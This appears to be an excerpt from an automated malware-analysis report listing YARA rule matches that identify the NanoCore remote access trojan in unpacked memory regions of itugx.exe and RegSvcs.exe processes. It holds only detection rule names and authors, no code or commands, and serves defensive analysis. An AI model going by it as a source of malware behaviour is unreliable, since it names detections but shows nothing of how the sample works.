Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
